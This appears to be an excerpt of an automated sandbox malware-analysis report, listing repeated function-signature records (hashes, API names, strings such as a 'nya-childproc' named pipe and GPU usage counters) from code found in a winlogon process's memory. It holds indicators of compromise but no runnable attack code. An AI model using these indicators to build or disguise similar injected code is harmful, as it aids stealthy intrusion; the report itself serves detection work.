                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction ID: ca4b8f56c7a682a2a92569bc2e3bd8a8144b2aa145878565410976a934b2335e
                                                                      • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction Fuzzy Hash: 95513B72220B84D6E725DF62E44839EBBA1FB88F99F444126DE4D47B58EF38D0558700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction ID: c984ef08d83f35b1eac2642061c1a48934d806646e156bbb58394d9480ac22c5
                                                                      • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                                      • Instruction Fuzzy Hash: B6511B32624B84D6E764DF62E45839EB7A2FB88F99F444126DE4E47768EF38C0558B00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                      • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                      • API String ID: 740688525-1880043860
                                                                      • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction ID: 4963eae51284f2d491dc6253db006444ff50d9d2712e617db342ead855e7e9f9
                                                                      • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction Fuzzy Hash: 25517931729A84D9EA159B66E8443EDB390BF48BB1F580B369E3E473D0EF38D4458750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                                      • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                      • API String ID: 740688525-1880043860
                                                                      • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction ID: 99d19baf59b3ad7721b439de8d72dcaaa497e8b356a8dce58398d0db58e19fcb
                                                                      • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                                      • Instruction Fuzzy Hash: 86518D31721BC8D2EA299B56E8403EDB690AF48BB0F5807379E7E477D4EF38D4658640
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm$ !-M
                                                                      • API String ID: 849930591-3980662079
                                                                      • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                                      • Instruction ID: 807cf59a37a189ea4db05904c9d3395bc5805ea2866621a6502f863b2ee37095
                                                                      • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                                      • Instruction Fuzzy Hash: DDD14972624780CBEB209F65D4413DDBBA0FB69B98F101126EE8D57BAADF34C5A1C701
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Running Time
                                                                      • API String ID: 1943346504-1805530042
                                                                      • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction ID: 6f277c073b86dc51bff5f7495ef6c7f35d57c6e260500943fc71c261ceb447f2
                                                                      • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction Fuzzy Hash: 5A318032624A80DBE721DF12E80879EF7A1FB88BD6F4546369E4D43A25DF38D4568740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Running Time
                                                                      • API String ID: 1943346504-1805530042
                                                                      • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction ID: cc9d9051079bcbc7772d4670f2c98b3b137ba7ab74e4a9fb74fc75109180be81
                                                                      • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction Fuzzy Hash: 9231A032620A81E7E726DF12E8447DDF7A0FB88BD5F444636AE4D43A64EF38D4668340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Running Time
                                                                      • API String ID: 1943346504-1805530042
                                                                      • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction ID: 680fbe4df5a4e389d42097ec8dfb9375e4b51d1580904d83da28f1f5e114076f
                                                                      • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction Fuzzy Hash: 90316F32A20A81D6E721DF22E8447DEF3A1FF98BD5F4446369E4D43A64EF38C5568B40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Utilization Percentage
                                                                      • API String ID: 1943346504-3507739905
                                                                      • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction ID: a797f8bf0b7667f3798a69baddeaf342a0209f41e3cdb4ad09486f1a35ce906a
                                                                      • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction Fuzzy Hash: F7313932624B85CAEB50DF22E88879DF7E1BB84F95F4541369E4E43724EE78C846D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Utilization Percentage
                                                                      • API String ID: 1943346504-3507739905
                                                                      • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction ID: 539c5f661ae9f47353c2f51a962f279c6ab86cc189f3481769e8d1f1aec9c66e
                                                                      • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction Fuzzy Hash: 4D315932720B85DAEB15DF26E88479DB7A0BB84F95F4541369E4E43724EF38D865C600
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Utilization Percentage
                                                                      • API String ID: 1943346504-3507739905
                                                                      • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction ID: 37b044a8039f61fcfb46c8d27b0efef2b9debc9d4a1bf034e39d0f1468016108
                                                                      • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction Fuzzy Hash: DC312F31620B86CAE750DF26E844B9EF3A1BF84F95F4441369E4E43724EF38C555DA00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                                      • Instruction ID: f9fd6b66e0a824dba5321a1e18a6c37c9628e8675697e92b11fc73f8f655f139
                                                                      • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                                      • Instruction Fuzzy Hash: 40D15772629B80CEEB609B65D4813DDB7E0FB49799F100226EE8D57B9ADF38C581C701
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                                      • Instruction ID: 9bf5cc6a1760f481c943986a686966ab1593a852faf4a865bfee481d6bd55f98
                                                                      • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                                      • Instruction Fuzzy Hash: 1FD15833624B82CAEB609B65D4413DDB7A0FB45798F100126EE8D57B9ADF38C591CB02
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                      • Instruction ID: d0682c950318b24ca3d3fa786114ee4e70fcf2b4d2bcf4c9ff14f52512c3598d
                                                                      • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                      • Instruction Fuzzy Hash: 98D15932624781CAFB609B65E4813EDB7A0FF55B99F100126EE8D57B9ADF38C591CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID: !-M
                                                                      • API String ID: 1666949209-3625753649
                                                                      • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                                      • Instruction ID: 47aa9fd017ce13dfdc8cce3b1fffb8f0b1d5320f829710c9dd302edf13d1fcb9
                                                                      • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                                      • Instruction Fuzzy Hash: 6CD16876215BC8C2DA719B1AE49439EBBA0F7C8B88F100526EE8D477A9DF3CC551CB01
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction ID: 38d4f9571245e440b7954d906e44009bf88ec267097f0bd0529f0bb9e571806e
                                                                      • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction Fuzzy Hash: 7A415E32224BC4DAE760DF21E44839EB7A1F789B99F44812ADE8D47758DF39C485CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction ID: 87b19685d5550d53dfa281649fbafee5f2a6432d358866bd9b176f0872fd3111
                                                                      • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction Fuzzy Hash: B4417E72224BC0DAE760DF21E44479EBBA1F788B99F44812ADE8D0B758DF38C495CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction ID: 29b9f728bab77240efbac586e63e46c34c41aa0db47c84664e4f4b0c4e543164
                                                                      • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction Fuzzy Hash: 3D413D72224BC4DAE760DF21E44479EB7A1F788B98F44812ADE8A47B58DF38C585CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                      • String ID: \\.\pipe\$nya-childproc
                                                                      • API String ID: 166002920-3933612297
                                                                      • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction ID: 53f6cef02f645eb2a2fe9a2c9db3bda22dae2a9c1ee46c936f8a3b94c1540e48
                                                                      • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction Fuzzy Hash: F311FC32624A80C2E710CB21F45839DBB60FB89B95F944226EE5E46AA8DF7DC145CB44
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                      • String ID: \\.\pipe\$nya-childproc
                                                                      • API String ID: 166002920-3933612297
                                                                      • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction ID: 846c3a5560e26103cabead096517360e1616f0bc0ff9605c36a1c1a426972b0f
